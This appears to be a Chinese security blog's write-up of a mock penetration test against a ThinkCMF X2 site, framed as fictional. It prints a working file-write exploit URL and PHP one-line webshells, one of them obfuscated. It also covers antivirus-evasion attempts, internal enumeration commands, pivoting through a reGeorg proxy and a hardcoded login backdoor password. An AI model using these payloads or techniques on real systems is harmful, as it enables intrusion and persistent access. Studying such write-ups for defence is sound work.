原创干货 | 记一次拟真环境的模拟渗透测试

2019-10-09 14:31:53 admin

前言

注:此文为虚构,如有雷同实属巧合。 
本文仅用于记录,Web打点,内网横向一些很常规化的东西。
目标站:http://vuln_attack/

任务:权限、横向

前·信息收集(踩点)
• 端口开放
    – 80 - HTTP
    – 3389 - RDP
• 指纹
    – ThinkCMF
    – PHP/5.6.36
    – IIS
• 目录探测(只探测状态码为301、302、200)
    – http://vuln_attack:80/admin (后台)
        • http://vuln_attack:80/admin/themes/
    – http://vuln_attack:80/api
    – http://vulnattack:80/aspnetclient (IIS结构)
    – http://vuln_attack:80/data
        • http://vuln_attack:80/data/logs/
        • http://vuln_attack:80/data/upload/
        • http://vuln_attack:80/data/backup/
        • http://vuln_attack:80/data/conf/
                – /index.html
                – /config.php
                – /db.php
    – http://vuln_attack:80/plugins
    – http://vuln_attack:80/public
    – http://vuln_attack:80/test (PHPINFO)
        • /log.txt
        • /0.php
        • /1.php
        • /00.php
        • /01.php
        • /02.php
        • /03.php
        • /04.php
        • /05.php
    – http://vuln_attack:80/themes
    – http://vuln_attack:80/update
    – http://vuln_attack:80/application
    – http://vuln_attack:80/cust
    – http://vuln_attack:80/re (500)
    – http://vuln_attack:80/rp (500)
    – http://vuln_attack:80/www.rar (网站备份源码)
    – http://vuln_attack:80/index.php
    – http://vuln_attack:80/license.txt
• 其他收集 通过下载www.rar文件获得网站备份源码获得的信息
    – 寻找密码
        • grep -i -r "pwd' => '" ./  结果:
            – sxxxx3
            – rxxxx3
        • grep -i -r "pass' => '" ./ 结果:无
        • grep -i -r "password' => '" ./ 结果:无

中·渗透打入

ThinkCMFx2 Xday Get Webshell

• 已知该系统业务为ThinkCMF,且通过泄露的源码文件中得知版本为x2.0.0

    define("SIMPLEWIND_CMF_VERSION", 'X2.0.0');

    使用ThinkCMF的GetWebshell的Exploit Xday打一波(结果:未成功)
访问r.php是404的:

但在本地搭建测试的时候是可以写入的(Exploit:/index.php?xxx=file_put_contents('r.php','<?php%20eval($_REQUEST[r]);')):

思考:a.是否可以写入但被删除 b.exp是否被拦截

– 修改exp为/index.php?xxx=file_put_contents('1.txt','123'):写入1.txt内容为123

结果: 上传成功访问存在,可利用exp写文件

– 修改exp为/index.php?xxx=file_put_contents('1.php','123'):写入1.php内容为123

结果: 上传成功访问存在,可利用exp写PHP文件
– 修改exp为
/index.php?xxx=file_put_contents('1.php','<?php+$a="assert";$a(base64_decode(@$_REQUEST[k]));?>')
     简单的写了一个绕过的PHP一句话脚本木马:
     <?php $a="assert";$a(@$_REQUEST[k]);?>
结果: 上传成功访问存在,Webshell拿下

后·深入

主机信息收集

域环境判断

• net user /domain
• 查看域内的用户(此处用来判断是否有域环境)
• 结果:此处非域环境
这项请求将在域 WORKGROUP 的域控制器处理。发生系统错误 1355。指定的域不存在,或无法联系。

信息收集

• whoami /all
• 查看当前用户

     •      net user
•  net localgroup administrators
•  查看本地管理员用户
      ipconfig / all 
  •     arp -a 

      •     tasklist

主机提权

    • systeminfo
    • 查看系统信息
根据获取的系统信息判断可使用的提权Exploit,尝试上传提权Exploit,运行即被杀:
C:\APP\www\>exp.exe'exp.exe' 不是内部或外部命令,也不是可运行的程序或批处理文件。
通过之前的信息收集知道存在"安全狗"防护软件,发现被杀的Exp都存放在C:\SafeDogRecycle\目录下,文件被随机命名:
后经测试发现将Exploit存在C:\SafeDogRecycle\目录部分行为并不会被杀,但敏感行为还是会被Kill掉。
本地搭建服务器安全狗,利用修改特征码的方式进行免杀,但即使Bypass了安全狗,Exploit也无法执行,补丁已经打上了。
利用收集到的口令进行字典的整合,猜测管理员密码也无解~
结果: 提权失败

横向

地址:
xxxx.129xxxx.135xxxx.149xxxx.150xxxx.168xxxx.190xxxx.191
端口扫描仅仅发现xxxx.129、 xxxx.135存在着服务

xxxx.135

访问该站点发现其为IIS8.5
经探测并无什么有价值性的东西。

xxxx.129

访问该站点发现到了其他的一个站点,这个站点也为ThinkCMFX2,使用上文所述方法拿下WebShell。
环境: Linux
内核: Linux izbp15gn5pyr1s5tlc45h0z 3.10.0-693.2.2.el7.x86_64
权限: www
网络环境: 内网
经过测试发现本机用户权限真的很低,gcc之类的操作都没权限进行,尝试使用suid提权也无果,就连反弹个shell都提示bash: /bin/sh: Permission denied,醉了~
放弃提权,reGeorg+Proxifier 代理进内网撸一波~

结果:发现一个内网主机存活,ThinkCMFX2又撸下来了

终·其他缺陷

对发现的其他安全缺陷做记录是一件很有必要的事情,为防止单个漏洞被修复,也为了下次更好的“进来”。

前台登录万能密码后门

文件

/application/Cust/Controller/LoginController.class.php第214行:

在做登录验证的时候有一个条件:$password=='xxxx@123',前台登录只需要满足密码等于xxxx@123即可实现任意用户的登录。

服务热线

17884544032

公司地址

安徽省合肥市蜀山区鑫鹏大厦

作息时间

周一至周五 9:00-18:00